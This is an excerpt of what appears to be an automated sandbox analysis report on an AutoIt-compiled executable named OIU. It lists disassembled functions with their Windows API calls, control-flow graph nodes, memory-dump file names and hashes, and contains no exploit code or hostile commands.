                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35BE
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35D3
                                                                      • LockResource.KERNEL32(00BA50AA,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20,?), ref: 00BE35E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                                      • Instruction ID: a6dd6a417527cd41f70e930dbdcfcad3f3c5ec40e13291b6ccc8d200e9fce0c5
                                                                      • Opcode Fuzzy Hash: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                                      • Instruction Fuzzy Hash: 44118E71250700BFDB258B65DC88F2B7BF9EBC6B51F1081A9F412E6290DBB1DC048720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                                        • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • GetForegroundWindow.USER32 ref: 00BE2C10
                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00C62224), ref: 00BE2C17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                      • String ID: runas
                                                                      • API String ID: 448630720-4000483414
                                                                      • Opcode ID: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                                      • Instruction ID: da9943d95218873ea81f685ee95af72df766417e60de403edff8d5f47a53db72
                                                                      • Opcode Fuzzy Hash: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                                      • Instruction Fuzzy Hash: 8E11D63110C3415BCB14FF68D891ABE77E4DB93750F4854ADF586520A2DF21894A9712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00BE5222), ref: 00C0DBCE
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00C0DBDD
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00C0DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0DBFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                                      • Instruction ID: fe24c1004dd8a196e86a7f776994fada3b88bdc3eb72679568397f8a9043aff6
                                                                      • Opcode Fuzzy Hash: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                                      • Instruction Fuzzy Hash: F2F0A03182092057D3206BB8AC4DAAF3B6C9E01334B104702F836D20F0EBB15A54CA95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00BCE505), ref: 00BD337E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem
                                                                      • String ID: GetSystemTimePreciseAsFileTime
                                                                      • API String ID: 2086374402-595813830
                                                                      • Opcode ID: e6d8d8b96e06fe111829b4d7aea8184a40ba81ea377cdcdcf7b3a95f7697b060
                                                                      • Instruction ID: be152c044920fd4177a198ff349b8ced69e38ed4afa3b30a5f92be24d9f4d468
                                                                      • Opcode Fuzzy Hash: e6d8d8b96e06fe111829b4d7aea8184a40ba81ea377cdcdcf7b3a95f7697b060
                                                                      • Instruction Fuzzy Hash: D6E0E531A50218BBD3206BA59C43F7EFBE0EF54B20B8401A9F8055B651DDA14E0097DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00BC09DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                                      • Instruction ID: a245283cef81f1873c8332e72d379cc53c28ce91ee94d426ff211a26d772293b
                                                                      • Opcode Fuzzy Hash: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BAD730 Relevance: 21.6, APIs: 14, Instructions: 616windowsleeptimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00BAD807
                                                                      • timeGetTime.WINMM ref: 00BADA07
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB28
                                                                      • TranslateMessage.USER32(?), ref: 00BADB7B
                                                                      • DispatchMessageW.USER32(?), ref: 00BADB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 00BADBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 2189390790-0
                                                                      • Opcode ID: b8be5e20b6d23e4bf2d2a9961aff33cee2fc055abedb1892e37f726a8b542098
                                                                      • Instruction ID: 0e159acf8913b425c1f7fcddb3605f0f61d277c70c8426d6c6fb1c317c2febd5
                                                                      • Opcode Fuzzy Hash: b8be5e20b6d23e4bf2d2a9961aff33cee2fc055abedb1892e37f726a8b542098
                                                                      • Instruction Fuzzy Hash: 0642D270608245EFD724CF24C885BBEB7E0FF46314F548A99E956876A1D770E888CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 301 be065b-be068b call be042f 304 be068d-be0698 call bcf2c6 301->304 305 be06a6-be06b2 call bd5221 301->305 310 be069a-be06a1 call bcf2d9 304->310 311 be06cb-be0714 call be039a 305->311 312 be06b4-be06c9 call bcf2c6 call bcf2d9 305->312 321 be097d-be0983 310->321 319 be0716-be071f 311->319 320 be0781-be078a GetFileType 311->320 312->310 323 be0756-be077c GetLastError call bcf2a3 319->323 324 be0721-be0725 319->324 325 be078c-be07bd GetLastError call bcf2a3 CloseHandle 320->325 326 be07d3-be07d6 320->326 323->310 324->323 330 be0727-be0754 call be039a 324->330 325->310 340 be07c3-be07ce call bcf2d9 325->340 328 be07df-be07e5 326->328 329 be07d8-be07dd 326->329 333 be07e9-be0837 call bd516a 328->333 334 be07e7 328->334 329->333 330->320 330->323 343 be0839-be0845 call be05ab 333->343 344 be0847-be086b call be014d 333->344 334->333 340->310 343->344 350 be086f-be0879 call bd86ae 343->350 351 be087e-be08c1 344->351 352 be086d 344->352 350->321 353 be08e2-be08f0 351->353 354 be08c3-be08c7 351->354 352->350 358 be097b 353->358 359 be08f6-be08fa 353->359 354->353 357 be08c9-be08dd 354->357 357->353 358->321 359->358 360 be08fc-be092f CloseHandle call be039a 359->360 363 be0963-be0977 360->363 364 be0931-be095d GetLastError call bcf2a3 call bd5333 360->364 363->358 364->363
                                                                      APIs
                                                                        • Part of subcall function 00BE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000), ref: 00BE03B7
                                                                      • GetLastError.KERNEL32 ref: 00BE076F
                                                                      • __dosmaperr.LIBCMT ref: 00BE0776
                                                                      • GetFileType.KERNELBASE ref: 00BE0782
                                                                      • GetLastError.KERNEL32 ref: 00BE078C
                                                                      • __dosmaperr.LIBCMT ref: 00BE0795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00BE07B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00BE08FF
                                                                      • GetLastError.KERNEL32 ref: 00BE0931
                                                                      • __dosmaperr.LIBCMT ref: 00BE0938
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                                      • Instruction ID: dd7f728e3958d2194c2cc81d58a96596140589a5693ad5fa8f40b78accd84a3f
                                                                      • Opcode Fuzzy Hash: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                                      • Instruction Fuzzy Hash: 58A12732A241858FDF19AF68D891BAD7BE1EB06320F24019DF815AF391D7719C52CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                                        • Part of subcall function 00BA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA3379
                                                                      • RegOpenKeyExW.KERNEL32 ref: 00BA356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00BE31CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00BE3210
                                                                      • _wcslen.LIBCMT ref: 00BE3277
                                                                      • _wcslen.LIBCMT ref: 00BE3286
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
                                                                      • Opcode ID: d90a1199a601abfb81400bda2b43e6c29a263fb46987bf216f34096ea6195e77
                                                                      • Instruction ID: 1cb656bf6837cd50c13a6efe6eb9a0c68239e14e2f39c544110a232966deea75
                                                                      • Opcode Fuzzy Hash: d90a1199a601abfb81400bda2b43e6c29a263fb46987bf216f34096ea6195e77
                                                                      • Instruction Fuzzy Hash: C3716C714083019EC714DF65DC86AAFBBE8FF85740F40486EF589971B0EB749A88CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32 ref: 00BA2B8E
                                                                      • LoadCursorW.USER32 ref: 00BA2B9D
                                                                      • LoadIconW.USER32 ref: 00BA2BB3
                                                                      • LoadIconW.USER32 ref: 00BA2BC5
                                                                      • LoadIconW.USER32 ref: 00BA2BD7
                                                                      • LoadImageW.USER32 ref: 00BA2BEF
                                                                      • RegisterClassExW.USER32(?), ref: 00BA2C40
                                                                        • Part of subcall function 00BA2CD4: GetSysColorBrush.USER32 ref: 00BA2D07
                                                                        • Part of subcall function 00BA2CD4: RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                                        • Part of subcall function 00BA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                                        • Part of subcall function 00BA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                                        • Part of subcall function 00BA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                                        • Part of subcall function 00BA2CD4: LoadIconW.USER32 ref: 00BA2D85
                                                                        • Part of subcall function 00BA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                                      • Instruction ID: b9479b51329311dbee1999ce43af53599c62661c670dfda503b6c095f151123f
                                                                      • Opcode Fuzzy Hash: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                                      • Instruction Fuzzy Hash: FC212C75E10314ABDB109FA9EC95BAD7FB8FB48B50F08405AFA08B66B0D7B14584CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 442 ba3170-ba3185 443 ba3187-ba318a 442->443 444 ba31e5-ba31e7 442->444 445 ba31eb 443->445 446 ba318c-ba3193 443->446 444->443 447 ba31e9 444->447 448 be2dfb-be2e23 call ba18e2 call bbe499 445->448 449 ba31f1-ba31f6 445->449 450 ba3199-ba319e 446->450 451 ba3265-ba326d PostQuitMessage 446->451 452 ba31d0-ba31d8 DefWindowProcW 447->452 488 be2e28-be2e2f 448->488 453 ba31f8-ba31fb 449->453 454 ba321d-ba3244 SetTimer RegisterWindowMessageW 449->454 456 be2e7c-be2e90 call c0bf30 450->456 457 ba31a4-ba31a8 450->457 459 ba3219-ba321b 451->459 458 ba31de-ba31e4 452->458 460 be2d9c-be2d9f 453->460 461 ba3201-ba3214 KillTimer call ba30f2 call ba3c50 453->461 454->459 463 ba3246-ba3251 CreatePopupMenu 454->463 456->459 481 be2e96 456->481 464 ba31ae-ba31b3 457->464 465 be2e68-be2e77 call c0c161 457->465 459->458 473 be2dd7-be2df6 MoveWindow 460->473 474 be2da1-be2da5 460->474 461->459 463->459 470 be2e4d-be2e54 464->470 471 ba31b9-ba31be 464->471 465->459 470->452 475 be2e5a-be2e63 call c00ad7 470->475 479 ba3253-ba3263 call ba326f 471->479 480 ba31c4-ba31ca 471->480 473->459 482 be2dc6-be2dd2 SetFocus 474->482 483 be2da7-be2daa 474->483 475->452 479->459 480->452 480->488 481->452 482->459 483->480 484 be2db0-be2dc1 call ba18e2 483->484 484->459 488->452 492 be2e35-be2e48 call ba30f2 call ba3837 488->492 492->452
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA316A,?,?), ref: 00BA31D8
                                                                      • KillTimer.USER32 ref: 00BA3204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BA3227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA316A,?,?), ref: 00BA3232
                                                                      • CreatePopupMenu.USER32 ref: 00BA3246
                                                                      • PostQuitMessage.USER32 ref: 00BA3267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                                      • Instruction ID: fed6f469296af68d4a6d5b11d7fa5aeec69ba4551373413fec8a8a573b160c78
                                                                      • Opcode Fuzzy Hash: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                                      • Instruction Fuzzy Hash: 4B413B3125C304ABDF145B7C9C8EB7D3AD9E747B40F0841A6FE0AA61A1CB71CE8097A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 498 bd8d45-bd8d55 499 bd8d6f-bd8d71 498->499 500 bd8d57-bd8d6a call bcf2c6 call bcf2d9 498->500 502 bd90d9-bd90e6 call bcf2c6 call bcf2d9 499->502 503 bd8d77-bd8d7d 499->503 516 bd90f1 500->516 521 bd90ec call bd27ec 502->521 503->502 506 bd8d83-bd8dae 503->506 506->502 509 bd8db4-bd8dbd 506->509 512 bd8dbf-bd8dd2 call bcf2c6 call bcf2d9 509->512 513 bd8dd7-bd8dd9 509->513 512->521 514 bd8ddf-bd8de3 513->514 515 bd90d5-bd90d7 513->515 514->515 519 bd8de9-bd8ded 514->519 520 bd90f4-bd90f9 515->520 516->520 519->512 523 bd8def-bd8e06 519->523 521->516 526 bd8e08-bd8e0b 523->526 527 bd8e23-bd8e2c 523->527 529 bd8e0d-bd8e13 526->529 530 bd8e15-bd8e1e 526->530 531 bd8e2e-bd8e45 call bcf2c6 call bcf2d9 call bd27ec 527->531 532 bd8e4a-bd8e54 527->532 529->530 529->531 535 bd8ebf-bd8ed9 530->535 564 bd900c 531->564 533 bd8e5b-bd8e79 call bd3820 call bd29c8 * 2 532->533 534 bd8e56-bd8e58 532->534 568 bd8e7b-bd8e91 call bcf2d9 call bcf2c6 533->568 569 bd8e96-bd8ebc call bd9424 533->569 534->533 537 bd8fad-bd8fb6 call bdf89b 535->537 538 bd8edf-bd8eef 535->538 551 bd9029 537->551 552 bd8fb8-bd8fca 537->552 538->537 541 bd8ef5-bd8ef7 538->541 541->537 545 bd8efd-bd8f23 541->545 545->537 549 bd8f29-bd8f3c 545->549 549->537 554 bd8f3e-bd8f40 549->554 556 bd902d-bd9045 ReadFile 551->556 552->551 557 bd8fcc-bd8fdb GetConsoleMode 552->557 554->537 559 bd8f42-bd8f6d 554->559 561 bd9047-bd904d 556->561 562 bd90a1-bd90ac GetLastError 556->562 557->551 563 bd8fdd-bd8fe1 557->563 559->537 567 bd8f6f-bd8f82 559->567 561->562 572 bd904f 561->572 570 bd90ae-bd90c0 call bcf2d9 call bcf2c6 562->570 571 bd90c5-bd90c8 562->571 563->556 565 bd8fe3-bd8ffd ReadConsoleW 563->565 566 bd900f-bd9019 call bd29c8 564->566 573 bd8fff GetLastError 565->573 574 bd901e-bd9027 565->574 566->520 567->537 578 bd8f84-bd8f86 567->578 568->564 569->535 570->564 575 bd90ce-bd90d0 571->575 576 bd9005-bd900b call bcf2a3 571->576 582 bd9052-bd9064 572->582 573->576 574->582 575->566 576->564 578->537 585 bd8f88-bd8fa8 578->585 582->566 589 bd9066-bd906a 582->589 585->537 590 bd906c-bd907c call bd8a61 589->590 591 bd9083-bd908e 589->591 603 bd907f-bd9081 590->603 597 bd909a-bd909f call bd88a1 591->597 598 bd9090 call bd8bb1 591->598 604 bd9095-bd9098 597->604 598->604 603->566 604->603
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
